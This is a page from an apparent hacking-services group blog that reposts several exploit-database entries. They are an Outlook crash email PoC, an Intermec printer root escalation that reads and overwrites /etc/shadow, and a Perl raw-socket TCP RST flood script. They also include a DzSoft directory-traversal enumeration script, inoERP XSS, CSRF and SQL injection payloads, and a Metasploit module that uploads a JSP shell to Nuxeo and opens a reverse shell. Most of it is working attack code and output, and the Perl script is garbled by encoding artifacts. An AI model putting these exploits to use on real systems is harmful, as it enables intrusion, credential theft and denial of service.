Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863206567

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
Source: https://justhaifei1.blogspot.ca/2017/03/an-interesting-outlook-bug.html

When you send this email to someone, when he/she *just read* the email, Outlook will crash. MSRC told me that they think it's a non-exploitable bug and it seems that they are not going to fix it in near future, I'm releasing the details in this quick write-up, and hopefully, for an "old pedant" style open discussion about the exploitability as I still have some doubts.:-)

The PoC could be as simple as the following, or you may download the .eml file below.

Content-Type: multipart/alternative; boundary="===============111111111111==
MIME-Version: 1.0
Subject: title
From: aa@msft.com
To: bb@msft.com

--===============111111111111==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit

plain text area
--===============111111111111==
Content-Type: text/html; charset="us-ascii"
MIME-Version: 1.0

<html>
<head>
<style>body{display:none !important;}</style>
</head>
<body>    
<div>
e
</div>
<div>
 <table>
  <tr height="1%">
  </tr>
 </table>
</div>
<div>
e
</div>
</body>
</html>

--===============111111111111==--


If you do some tests based on the PoC you will quickly figure out that the CSS code "<style>body{display:none !important;}</style>" is something important here. For example, if we remove this line, Outlook won't crash. This also suggests that the bug is related to some "CSS rendering" code in Outlook.


The Crash

The following crash should be observed on Office 2010 14.0.7177.5000, full updated as of March 21, 2017. In fact, I believe it affects all Outlook versions.

(384.400): Access violation - code c0000005 (!!! second chance !!!)
eax=0020f580 ebx=0ea72288 ecx=00000000 edx=00000000 esi=191cdfd0 edi=5d064400
eip=5c5e17e5 esp=0020f56c ebp=0020f754 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
wwlib!DllGetLCID+0x25b35f:
5c5e17e5 f781e402000000040000 test dword ptr [ecx+2E4h],400h ds:0023:000002e4=????????
0:000> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
0020f754 5c5a2b93 wwlib!DllGetLCID+0x25b35f
0020f774 5c1d80de wwlib!DllGetLCID+0x21c70d
0020f794 5c1d801b wwlib!GetAllocCounters+0x51906
0020f818 5c1d5c33 wwlib!GetAllocCounters+0x51843
0020f82c 5c26d803 wwlib!GetAllocCounters+0x4f45b
0020f83c 2f63f1b6 wwlib!GetAllocCounters+0xe702b
0020f880 2f63f06b outlook!GetMsoInst+0x32e2
0020f8a8 2ffb9d6b outlook!GetMsoInst+0x3197
0020f938 76b0ef1c outlook!PushSavedKeyToCicero+0x291d8
0020f944 7733367a kernel32!BaseThreadInitThunk+0xe
0020f984 7733364d ntdll!__RtlUserThreadStart+0x70
0020f99c 00000000 ntdll!_RtlUserThreadStart+0x1b

It crashes at the following address:

.text:31B417D2 loc_31B417D2: ; CODE XREF: sub_31714D18+42CB1Ej
.text:31B417D2 lea eax, [ebp+var_1DC]
.text:31B417D8 push eax
.text:31B417D9 push [ebp+var_4]
.text:31B417DC push ebx
.text:31B417DD call sub_3177CE19                          ;memory data at eax will be updated
.text:31B417E2 mov ecx, [eax+48h]                           ;read the pointer at offset 0x48
.text:31B417E5 test dword ptr [ecx+2E4h], 400h      ;crash


Since the data pointed by EAX (@31B417E2) will be updated in function "sub_3177CE19", I did some debugging in that function, and it seems that:
There seems to be a custom heap allocator, as I've seen heap block headers, and links.
The "sub_3177CE19" does the job locating the data based on the 1st param (a pointer) and 2nd param (always be 0), and the data will be copied to the heap block pointed by the 3nd param.
According to my tests, the copied bytes are always 0x00, so that's why it seems to be a null pointer dereference bug.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41756.zip
HireHackking 
# TITLE: Intermec Industrial Printers Local root with Busybox jailbreak

# Date: March 28th, 2017
# Author: Bourbon Jean-marie (kmkz) from AKERVA company | @kmkz_security

# Product Homepage:
    http://www.intermec.com/products/prtrpm43a/

# Firmware download:
    http://www.intermec.com/products/prtrpm43a/downloads.aspx

# Tested on :
    model: PM43 RFID Industrial printer   
    firmware version: 10.10.011406
    kernel: Linux PM43-xxxxxxx 2.6.31 #1 PREEMPT Mon Oct 26 10:49:59 SGT 2015 armv5tejl GNU/Linux

# CVSS: 7.5 (CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H)
# OVE ID: OVE-20170131-0001
# CVE ID: CVE-2017-5671
# OSVDB ID: n/a
 
# Thanks:
    Dany Bach (Rioru) from AKERVA company for the exploitation design during the pentest during which the CVE-2017-5671 was discovered | @DDXhunter
    Honeywell team which was really reactive (with special thanks to Kevin Staggs) !

# Credits:
    The security notification that Intermec (Honeywell) sent to all of their dealers: 
     https://github.com/kmkz/exploit/blob/master/CVE-2017-5671-Credits.pdf 
  
# Additional ressource:
  https://akerva.com/blog/intermec-industrial-printers-local-root-with-busybox-jailbreak/
 
# Affected products:
    PM23, PM42, PM43, PC23, PC43, PD43 and PC42 printers with versions prior to March 2017
   
# Fixes:
    Download the new firmware version by using the link below:
    http://epsfiles.intermec.com/eps_files/eps_download/Firmware_P10.11.013310.zip

# Release note:
    http://apps.intermec.com/downloads/eps_download/Firmware%20Release%20Notes%20x10_11_013310.pdf
   
 
Intermec (Honeywell) Industrial RFID Printers Local root privilege escalation with Busybox jailbreak
 
I. PRODUCT

PM43/PM43c mid-range industrial RFID printers are ideal for a wide range of applications within the distribution center / warehouse and manufacturing environments.
 
II. ADVISORY
 
Using a bad file permission, it is possible to gain full root privilege on a PM43 industrial printer as well as from the admin account than it-admin which are the two default users on the machine.
It also permits to gain full privilege resulting on a Busybox jailbreak due to the root access on the system.
The impact of this exploitation is quite critical due to the sensitive information that are available and impact the recent firmware version release (before  March 12th 2017).
 
III. VULNERABILITY DESCRIPTION
 
The Lua binary rights are too permissive and this one is SUID which conduct to perform this privilege escalation using a basic trick as describe in the next section.
The default it-admin and/or admin credentials are available in the vendor's documentation and should be modified too.

IV. PROOF OF CONCEPT
 
Following steps can reproduce the privilege escalation once the attacker gain a Busybox shell on the system:

itadmin@PM43-XXXXXXXXXXX /tmp$ find / -perm -g=s -type f 2>/dev/null
/bin/busybox
/usr/bin/cfg
/usr/bin/lua <----- Lua binary with SUID perm.
/usr/bin/httpd_restore
/usr/bin/ikev2
/usr/bin/pwauth
/usr/bin/functest
/usr/bin/imecutil
/usr/bin/httpd_fwupgrade
/usr/sbin/setkey

We then try to execute a shell command using Lua but it seems that this one is executed with non-root privileges through the Busybox shell:

itadmin@PM43-XXXXXXXXXXX /tmp$ /usr/bin/lua
Lua 5.1.4  Copyright (C) 1994-2008 Lua.org, PUC-Rio
> os.execute("id")
uid=1(itadmin) gid=1(itadmin) groups=1(itadmin),2(admin),3(user)

So we identify that it is possible to read/write files with root privilege on the file system without any restrictions (we will be able to modify the shadow file in order to log in as root later):

// in the Lua interpreter:

> f=io.open("/etc/shadow","rb")
> print(f)
file (0x17af0)
> c=f:read "*a"
> print(c)
root:!$1$XPCuiq25$IvWw/kKeomOyQIee8XfTb1:11851:0:99999:7:::
admin:$1$Ma/qTlIw$PPPTgRVCnkqcDQxjMBtsC0:11851:0:99999:7:::
itadmin:$1$kcHXJUjT$OIgLfTDgaEAlTbHRZFPsj.:11851:0:99999:7:::
user::11851:0:99999:7:::
ftp:*:11851:0:99999:7:::
nobody:*:11851:0:99999:7:::
lighttpd:x:1000:1000:Linux User,,,:/home/lighttpd:/bin/sh
 
We conclude this "proof of concept" by writing a file on the filesystem which demonstrate the possibilities that we now have using this kind of code:

fp = io.popen("akerva", "w")
fp:write(anything)
fp:close()

That gave us the following output:

itadmin@PM43-XXXXXXXXXXX /tmp$ cat akerva
AKERVA r00t
itadmin@PM43-XXXXXXXXXXX /tmp$ ls -alsh akerva
   4 -rw-rw-r--    1 root     root           12 Jan 25 07:12 akerva

As explained in the above text, we then over-writed the "etc/shadow" file and we validated that it is possible to gain full root access on the filesystem even if Busybox 1.15.0 (2009 release) were present, bypassing
its shell restrictions (jailbreaking it).
 
V. RECOMMENDATIONS

AKERVA's Pentesters recommended to fix it by modifying the Lua binary rights (is the SUID bit necessary?) which was done in the patched firmware.
A security fix is now available in order to mitigate this issue as shown at the beginning of this advisory.

VI. VERSIONS AFFECTED
 
This issue affects the firmware version 10.10.011406 but after reading the latest release notes it also seems to impact all versions that were released before the updated firmware.
 
VII. TIMELINE
 
January 19th, 2017: Vulnerability identification
January 27th, 2017: First contact with the editor (Honeywell)
January 31th, 2017: Advisory submission to Honeywell security team and CVE id request
February 1st, 2017: CVE id attributed by MITRE even if the vendor is not normally considered a priority for CVE by MITRE
February 6th, 2017: Vendor confirm the vulnerability
February 16th, 2017: Vendor inform that the fix is ready (They also proposed me to test it prior to release)
March 12th, 2017: New firmware version available
March 28th, 2017: Public advisory released
 
VIII. LEGAL NOTICES
 
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of this advisory.
HireHackking 
#!/usr/local/bin/perl

use Socket;

$src_host =3D $ARGV[0];=20
$src_port =3D $ARGV[1];=20
$dst_host =3D $ARGV[2];=20
$dst_port =3D $ARGV[3];=20

if(!defined $src_host or !defined $src_port or !defined $dst_host or !defin=
ed $dst_port)=20
{
=09
=09print "Usage: $0 <source host> <source port> <dest host> <dest port>\n";
=09exit;
}=20
else=20
{
=09
=09main();
}
=20
sub main=20
{
=09my $src_host =3D (gethostbyname($src_host))[4];
=09my $dst_host =3D (gethostbyname($dst_host))[4];
=09$IPROTO_RAW =3D 255;
=09socket($sock , AF_INET, SOCK_RAW, $IPROTO_RAW)=20
=09=09or die $!;
=09my ($packet) =3D makeheaders($src_host, $src_port, $dst_host, $dst_port)=
;
=09my ($destination) =3D pack('Sna4x8', AF_INET, $dst_port, $dst_host);
=09while(1)
=09{
=09=09send($sock , $packet , 0 , $destination)
=09=09=09or die $!;
=09}
}

sub makeheaders=20
{
=09$IPPROTO_TCP =3D 6;
=09local($src_host , $src_port , $dst_host , $dst_port) =3D @_;
=09my $zero_cksum =3D 0;
=09my $tcp_len =3D 20;
=09my $seq =3D 19456;
=09my $seq_ack =3D 0;
=09my $tcp_doff =3D "5";
=09my $tcp_res =3D 0;
=09my $tcp_doff_res =3D $tcp_doff . $tcp_res;
=09my $tcp_urg =3D 0;=20
=09my $tcp_ack =3D 0;
=09my $tcp_psh =3D 0;
=09my $tcp_rst =3D 1;
=09my $tcp_syn =3D 0;
=09my $tcp_fin =3D 0;
=09my $null =3D 0;
=09my $tcp_win =3D 124;
=09my $tcp_urg_ptr =3D 44;
=09my $tcp_flags =3D $null . $null . $tcp_urg . $tcp_ack . $tcp_psh . $tcp_=
rst . $tcp_syn . $tcp_fin ;
=09my $tcp_check =3D 0;
=09my $tcp_header =3D pack('nnNNH2B8nvn' , $src_port , $dst_port , $seq, $s=
eq_ack , $tcp_doff_res, $tcp_flags,  $tcp_win , $tcp_check, $tcp_urg_ptr);
=09my $tcp_pseudo =3D pack('a4a4CCn' , $src_host, $dst_host, 0, $IPPROTO_TC=
P, length($tcp_header) ) . $tcp_header;
=09$tcp_check =3D &checksum($tcp_pseudo);
=09my $tcp_header =3D pack('nnNNH2B8nvn' , $src_port , $dst_port , $seq, $s=
eq_ack , $tcp_doff_res, $tcp_flags,  $tcp_win , $tcp_check, $tcp_urg_ptr);
=09my $ip_ver =3D 4;
=09my $ip_len =3D 5;
=09my $ip_ver_len =3D $ip_ver . $ip_len;
=09my $ip_tos =3D 00;
=09my $ip_tot_len =3D $tcp_len + 20;
=09my $ip_frag_id =3D 19245;
=09my $ip_ttl =3D 25;
=09my $ip_proto =3D $IPPROTO_TCP;=09
=09my $ip_frag_flag =3D "010";
=09my $ip_frag_oset =3D "0000000000000";
=09my $ip_fl_fr =3D $ip_frag_flag . $ip_frag_oset;
=09my $ip_header =3D pack('H2CnnB16CCna4a4',=09$ip_ver_len, $ip_tos, $ip_to=
t_len, $ip_frag_id,=09$ip_fl_fr , $ip_ttl , $ip_proto , $zero_cksum , $src_=
host , $dst_host);
=09my $pkt =3D $ip_header . $tcp_header;
=09return $pkt;
}
sub checksum=20
{
=09my ($msg) =3D @_;
=09my ($len_msg,$num_short,$short,$chk);
=09$len_msg =3D length($msg);
=09$num_short =3D $len_msg / 2;
=09$chk =3D 0;
=09
=09foreach $short (unpack("S$num_short", $msg))=20
=09{
=09=09$chk +=3D $short;
=09}
=09
=09$chk +=3D unpack("C", substr($msg, $len_msg - 1, 1)) if $len_msg % 2;
=09$chk =3D ($chk >> 16) + ($chk & 0xffff);
=09
=09return(~(($chk >> 16) + $chk) & 0xffff);
}=20
HireHackking 
[+] Credits: John Page AKA hyp3rlinx	
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/DZSOFT-v4.2.7-PHP-EDITOR-FILE-ENUMERATION.txt
[+] ISR: ApparitionSec            
 


Vendor:
==============
www.dzsoft.com



Product:
=========================
DzSoft PHP Editor v4.2.7

DzSoft PHP Editor is a tool for writing and testing PHP and HTML pages.



Vulnerability Type:
====================
File Enumeration




CVE Reference:
==============
N/A

 

Security Issue:
================
DzSoft comes with a built-in web server used to preview PHP files, the built-in web server is prone to file enumeration
attacks when combining "HEAD" method HTTP requests with directory traversal "\../../" type attacks. This can aid attackers
in information gathering (File enumeration) to help in possibly furthering attacks.

On install DzSoft users get Windows network warning like:

"Allow Dzsoft to communicate on these networks:"

Private networks, such as my home or work network

Public networks, such as those in airports and coffee shops (not recommended).

This selection will create Firewall rule and determine remote connections allowed to DzSoft editors built-in server.
Then when remote user make HTTP request to DzSoft they will get HTTP 403 Forbidden from the built-in web server. 

e.g.

curl  -v "http://VICTIM-IP/\../mysql/data/mysql.pid"


< HTTP/1.1 403 Forbidden
< Content-Type: text/html
< Content-Length: 1554
<
<HTML>
<HEAD>
  <TITLE>403 Forbidden</TITLE>
</HEAD>
<BODY>
<!-- ---------------------------------------------------------------------------------------------------- -->
<!-- ---------------------------------------------------------------------------------------------------- -->
<!-- ---------------------------------------------------------------------------------------------------- -->
<!-- ---------------------------------------------------------------------------------------------------- -->
<!-- ---------------------------------------------------------------------------------------------------- -->
<!-- ---------------------------------------------------------------------------------------------------- -->
<!-- ---------------------------------------------------------------------------------------------------- -->
<!-- ---------------------------------------------------------------------------------------------------- -->
<!-- ---------------------------------------------------------------------------------------------------- -->
<!-- ---------------------------------------------------------------------------------------------------- -->
<H1>Forbidden</H1>
<p>For security reasons, you cannot access the built-in web server of DzSoft PHP Editor from another computer.</p>
<p>If you see this message within DzSoft PHP Editor's window, or if you think that there might be reasons to enable access from other computers,
</BODY>
</HTML>
* Connection #0 to host x.x.x.x left intact



However, this 403 Forbidden access control can be bypassed by malicious users to "stat" files in and outside the webroot.

e.g. mysql directory.

File enumeration Conditions: 

These setting is found under Run / Run Options / Paramaters tab

a) DZSoft built-in web server is running 
b) DZSoft built-in web servers "REMOTE_HOST=x.x.x.x" and "REMOTE_ADDR=x.x.x.x" is set to a real IP other than localhost.

For POC create and save a PHP file under XAMPP/htdocs and run DzSoft built-in web server in preview mode.

Next make request for "mysql/my-huge.ini" to see if exists.


C:\>curl  -v -I "http://VICTIM-IP/\../mysql/my-huge.ini"
*   Trying VICTIM-IP...
* Connected to VICTIM-IP (VICTIM-IP) port 80 (#0)
> HEAD /\../mysql/my-huge.ini HTTP/1.1
> User-Agent: curl/7.41.0
> Host: VICTIM-IP
> Accept: */*
>
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Content-Type:
Content-Type:
< Content-Length: 5057
Content-Length: 5057
< Cache-Control: no-cache
Cache-Control: no-cache


Checking for "mysql.pid"
/////////////////////////


C:\>curl  -v -I "http://VICTIM-IP/\../mysql/data/mysql.pid"
*   Trying VICTIM-IP...
* Connected to VICTIM-IP (VICTIM-IP) port 80 (#0)
> HEAD /\../mysql/data/mysql.pid HTTP/1.1
> User-Agent: curl/7.41.0
> Host: VICTIM-IP
> Accept: */*
>
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Content-Type:
Content-Type:
< Content-Length: 5
Content-Length: 5
< Cache-Control: no-cache
Cache-Control: no-cache
< Expires: 0


Checking for "xampp_shell.bat"
///////////////////////////////

C:\>curl  -v -I "http://VICTIM-IP/\../xampp_shell.bat"
*   Trying VICTIM-IP...
* Connected to VICTIM-IP (VICTIM-IP) port 80 (#0)
> HEAD /\../xampp_shell.bat HTTP/1.1
> User-Agent: curl/7.41.0
> Host: VICTIM-IP
> Accept: */*
>
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Content-Type:
Content-Type:
< Content-Length: 1084
Content-Length: 1084
< Cache-Control: no-cache


These also work...


[root@localhost local]# wget -S --spider  "http://VICTIM-IP:8080/\../mysql/my-huge.ini"
--10:26:21--  http://VICTIM-IP:8080/%5C../mysql/my-huge.ini
Connecting to VICTIM-IP:8080... connected.
HTTP request sent, awaiting response... 
  HTTP/1.0 200 OK
  Content-Type: 
  Content-Length: 5057
  Cache-Control: no-cache
  Expires: 0
Length: 5057 (4.9K) []
200 OK


[root@localhost local]# wget -S --spider  "http://VICTIM-IP:8080/\../mysql/my-innodb-heavy-4G.ini"
--10:29:03--  http://VICTIM-IP:8080/%5C../mysql/my-innodb-heavy-4G.ini
Connecting to VICTIM-IP:8080... connected.
HTTP request sent, awaiting response... 
  HTTP/1.0 200 OK
  Content-Type: 
  Content-Length: 20906
  Cache-Control: no-cache
  Expires: 0
Length: 20906 (20K) []
200 OK


Tested Windows XAMPP, Linux / curl
curl 7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5


//////////////////////////////////////////

Next, target files on C:\ Drive.

Bypass 401 Forbidden to enumerate a file on C:\ drive named "hi.txt"
wget "http://127.0.0.1:8088/c/hi.txt"  -c --header="Range: bytes=0"



Exploit/POC:
=============
In DZSoft PHP Editor

1) Change DzSoft web server options for remote address to IP other than localhost.
2) Create test PHP file deploy under xampp/htdocs or whatever Apache your using.
3) Start DzSofts built-in webserver to preview PHP file 

Then,


import socket

print 'DzSoft File Enumeration POC'
print 'Hyp3rlinx / ApparitionSec'

IP=raw_input("[IP]>")
PORT=int(raw_input("[PORT]>"))
DEPTH=int(raw_input("[DEPTH]>"))
FILE=raw_input("[FILE]>")
ENUM="HEAD "+"/\\"
ENUM+="../"*DEPTH+FILE+ " HTTP/1.0\r\n\r\n"

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((IP,PORT))
s.send(ENUM)
print 'Enumerating file:'
print ENUM
output = s.recv(128)
print output
s.close()




Network Access:
===============
Remote



Severity:
=========
Medium



Disclosure Timeline:
==================================
Vendor Notification: No reply
March 27, 2017 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
HireHackking 
=== FOXMOLE - Security Advisory 2017-01-25 ===

inoERP  - Multiple Issues
~~~~~~~~~~~~~~~~~~~~~~~~~

Affected Versions
=================
inoERP 0.6.1

Issue Overview
==============
Vulnerability Type: SQL Injection, Cross Site Scripting, Cross Site Request Forgery, Session Fixation
Technical Risk: critical
Likelihood of Exploitation: medium
Vendor: inoERP
Vendor URL: http://inoideas.org/  /  https://github.com/inoerp/inoERP
Credits: FOXMOLE employee Tim Herres
Advisory URL: https://www.foxmole.com/advisories/foxmole-2017-01-25.txt
Advisory Status: Public
OVE-ID: OVE-20170126-0002
CVSS 2.0: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)


Impact
======
There are multiple SQL Injection vulnerabilities, exploitable without authentication.
An attacker could use the SQL Injection to access the database in an unsafe way.
This means there is a high impact to all applications.
The inoERP software also lacks in input validation resulting in different reflected/stored XSS vulnerabilities.


Issue Description
=================
The following findings are only examples, there are quite more. The whole application should be reviewed.

All items tested using FF52.

1.) Cross Site Scripting:
Stored:
Create a new Question in the -->Forum --> Ask a question
Vulnerable fields : Title, Content
Used Payload: Test<script>alert("xss")</script>

Response:
[...]
 <title>Test<script>alert("xss")</script> - inoERP!</title>
[...]

The latest questions are included in the start page which means the entered payload gets executed directly in the start page.

Reflected:
With Auth:
http://192.168.241.143/inoerp/form.php?class_name=%3CscRipt%3Ealert(%22xss%22)%3C%2fscRipt%3E&mode=9&user_id=7
http://192.168.241.143/inoerp/includes/json/json_blank_search.php?class_name=content&content_type_id=49&window_type=%22%3C/scRipt%3E%3CscRipt%3Ealert(%22xss%22)
%3C/scRipt%3E
http://192.168.241.143/inoerp/program.php?class_name=%3CscRipt%3Ealert(%22xss%22)%3C%2fscRipt%3E&program_name=prg_all_combinations&program_type=download_report

Unauthenticated:
http://192.168.241.143/inoerp/index.php/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(%22xss%22)%3C/scRipt%3E

2.) No protection against Cross Site Request Forgery Attacks:
PoC: Changing the admin user credentials.

<html>
<body>
    <form action="http://<IP>/inoerp/form.php?class_name=user" method="POST">
      <input type="hidden" name="headerData&#91;0&#93;&#91;name&#93;" value="user&#95;id&#91;&#93;" />
      <input type="hidden" name="headerData&#91;0&#93;&#91;value&#93;" value="1" />
      <input type="hidden" name="headerData&#91;1&#93;&#91;name&#93;" value="username&#91;&#93;" />
      <input type="hidden" name="headerData&#91;1&#93;&#91;value&#93;" value="inoerp" />
      <input type="hidden" name="headerData&#91;2&#93;&#91;name&#93;" value="enteredPassword&#91;&#93;" />
      <input type="hidden" name="headerData&#91;2&#93;&#91;value&#93;" value="test" />
      <input type="hidden" name="headerData&#91;3&#93;&#91;name&#93;" value="enteredRePassword&#91;&#93;" />
      <input type="hidden" name="headerData&#91;3&#93;&#91;value&#93;" value="test" />
      <input type="hidden" name="headerData&#91;4&#93;&#91;name&#93;" value="first&#95;name&#91;&#93;" />
      <input type="hidden" name="headerData&#91;4&#93;&#91;value&#93;" value="inoerp" />
      <input type="hidden" name="headerData&#91;5&#93;&#91;name&#93;" value="last&#95;name&#91;&#93;" />
      <input type="hidden" name="headerData&#91;5&#93;&#91;value&#93;" value="inoerp" />
      <input type="hidden" name="headerData&#91;6&#93;&#91;name&#93;" value="email&#91;&#93;" />
      <input type="hidden" name="headerData&#91;6&#93;&#91;value&#93;" value="inoerp&#64;no&#45;site&#46;com" />
      <input type="hidden" name="headerData&#91;7&#93;&#91;name&#93;" value="phone&#91;&#93;" />
[..snipped...]

If a privileged user activates the request, the admin user id=1 is set to "test".

3.) SQL Injection:
Auth required:No
#####
http://192.168.241.143/inoerp/form.php?
Parameter: module_code (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or
GROUP BY clause
    Payload: module_code=test' RLIKE (SELECT (CASE WHEN (2838=2838) THEN
0x74657374 ELSE 0x28 END))-- qkmO

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
    Payload: module_code=test' AND (SELECT 8706 FROM(SELECT
COUNT(*),CONCAT(0x716b7a6271,(SELECT
(ELT(8706=8706,1))),0x7171626a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NPEq

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (comment)
    Payload: module_code=test';SELECT SLEEP(5)#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: module_code=test' OR SLEEP(5)-- STgC

Exploitable using e.g. SQLMAP

Blind SQL Injection:
sqlmap -u
"http://192.168.241.143/inoerp/content.php?content_type%5b%5d=test&search_text=3&search_document_list%5b%5d=all"
 -p "content_type%5b%5d" --dbms="MySQL"
Parameter: content_type[] (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: content_type[]=-8366' OR 7798=7798 AND
'eanR'='eanR&search_text=3&search_document_list[]=all

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: content_type[]=test' OR SLEEP(5) AND
'exIO'='exIO&search_text=3&search_document_list[]=all
#####

4.) Session Fixation:
After a successful login the SessionID PHPSESSID remains the same:
Before Login: INOERP123123=t4e5ef5kqnv6d1u2uguf7lraa2
After Login: INOERP123123=t4e5ef5kqnv6d1u2uguf7lraa2




Temporary Workaround and Fix
============================
FOXMOLE advises to restrict the access to all vulnerable inoERP systems until all vulnerabilities are fixed.



History
=======
2017-01-25  Issue discovered
2017-01-26  Vendor contacted -> no response
2017-02-20  Vendor contacted again -> no response
2017-03-06  Vendor contacted again -> no response
2017-03-27  Advisory Release


GPG Signature
=============
This advisory is signed with the GPG key of the FOXMOLE advisories team.
The key can be downloaded here: https://www.foxmole.com/advisories-key-3812092199E3277C.asc
HireHackking 
=begin
# Description

Nuxeo Platform is a content management system for enterprises (CMS).
It embeds an Apache Tomcat server, and can be managed through a web
interface.

One of its features allows authenticated users to import files to the
platform.
By crafting the upload request with a specific ``X-File-Name`` header,
one can successfuly upload a file at an arbitrary location of the server
file system.

It is then possible to upload a JSP script to the root directory of the
web application to execute commands on the remote host operating system.
Setting the value ``../../nxserver/nuxeo.war/shell.jsp`` to the
``X-File-Name`` header is a way to do so.

## Details

**CVE ID**: CVE-2017-5869

**Access Vector**: network

**Security Risk**: high

**Vulnerability**: CWE-434

**CVSS Base Score**: 8.8

**CVSS Vector**: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

# Proof of Concept

Here is a metasploit module to exploit this vulnerability:

=end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpClient

    def initialize(info={})
        super(update_info(info,
            'Name'              => "Nuxeo Platform File Upload RCE",
            'Description'       => %q{
                The Nuxeo Platform tool is vulnerable to an authenticated remote code execution,
                thanks to an upload module.
            },
            'License'           => MSF_LICENSE,
            'Author'            => ['Ronan Kervella <r.kervella@sysdream.com>'],
            'References'        =>
                [
                    ['https://nuxeo.com/', '']
                ],
            'Platform'          => %w{linux},
            'Targets'           => [ ['Nuxeo Platform 6.0 to 7.3', 'Platform' => 'linux'] ],
            'Arch'              => ARCH_JAVA,
            'Privileged'        => true,
            'Payload'           => {},
            'DisclosureDate'    => "",
            'DefaultTarget'     => 0))
        register_options(
            [
                OptString.new('TARGETURI', [true, 'The path to the nuxeo application', '/nuxeo']),
                OptString.new('USERNAME', [true, 'A valid username', '']),
                OptString.new('PASSWORD', [true, 'Password linked to the username', ''])
            ], self.class)
    end

    def jsp_filename
        @jsp_filename ||= Rex::Text::rand_text_alpha(8) + '.jsp'
    end

    def jsp_path
        'nxserver/nuxeo.war/' + jsp_filename
    end

    def nuxeo_login
        res = send_request_cgi(
            'method' => 'GET',
            'uri'    => normalize_uri(target_uri.path, '/login.jsp')
        )

        fail_with(Failure::Unreachable, 'No response received from the target.') unless res
        session_cookie = res.get_cookies

        res = send_request_cgi(
            'method'    => 'POST',
            'uri'       => normalize_uri(target_uri.path, '/nxstartup.faces'),
            'cookie'    => session_cookie,
            'vars_post' => {
                'user_name'     => datastore['USERNAME'],
                'user_password' => datastore['PASSWORD'],
                'submit'        => 'Connexion'
            }
        )
        return session_cookie if res && res.code == 302 && res.redirection.to_s.include?('view_home.faces')
        nil
    end

    def trigger_shell
        res = send_request_cgi(
            'method'    => 'GET',
            'uri'       => normalize_uri(target_uri.path, jsp_filename)
        )
        fail_with(Failure::Unknown, 'Unable to get #{full_uri}/#{jsp_filename}') unless res && res.code == 200
    end

    def exploit
        print_status("Authenticating using #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
        session_cookie = nuxeo_login
        if session_cookie
            payload_url = normalize_uri(target_uri.path, jsp_filename)
            res = send_request_cgi(
                'method'    => 'POST',
                'uri'       => normalize_uri(target_uri.path, '/site/automation/batch/upload'),
                'cookie'    => session_cookie,
                'headers'    => {
                    'X-File-Name'   => '../../' + jsp_path,
                    'X-Batch-Id'    => '00',
                    'X-File-Size'   => '1024',
                    'X-File-Type'   => '',
                    'X-File-Idx'    => '0',
                    'X-Requested-With'  => 'XMLHttpRequest'
                },
                'ctype'             => '',
                'data' => payload.encoded
            )
            fail_with(Failure::Unknown, 'Unable to upload the payload') unless res && res.code == 200
            print_status("Executing the payload at #{normalize_uri(target_uri.path, payload_url)}.")
            trigger_shell
        else
            fail_with(Failure::Unknown, 'Unable to login')
        end
    end

end

=begin
Module output:

```bash
msf> use exploit/multi/http/nuxeo
msf exploit(nuxeo) > set USERNAME user1
USERNAME => user1
msf exploit(nuxeo) > set PASSWORD password
PASSWORD => password
msf exploit(nuxeo) > set rhost 192.168.253.132
rhost => 192.168.253.132
msf exploit(nuxeo) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf exploit(nuxeo) > set lhost 192.168.253.1
lhost => 192.168.253.1
msf exploit(nuxeo) > exploit

[-] Handler failed to bind to 192.168.253.1:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Authenticating using user1:password
[*] Executing the payload at /nuxeo/nuxeo/QBCefwxQ.jsp.
[*] Command shell session 1 opened (172.17.0.2:4444 ->
192.168.253.132:43279) at 2017-01-13 14:47:25 +0000

id
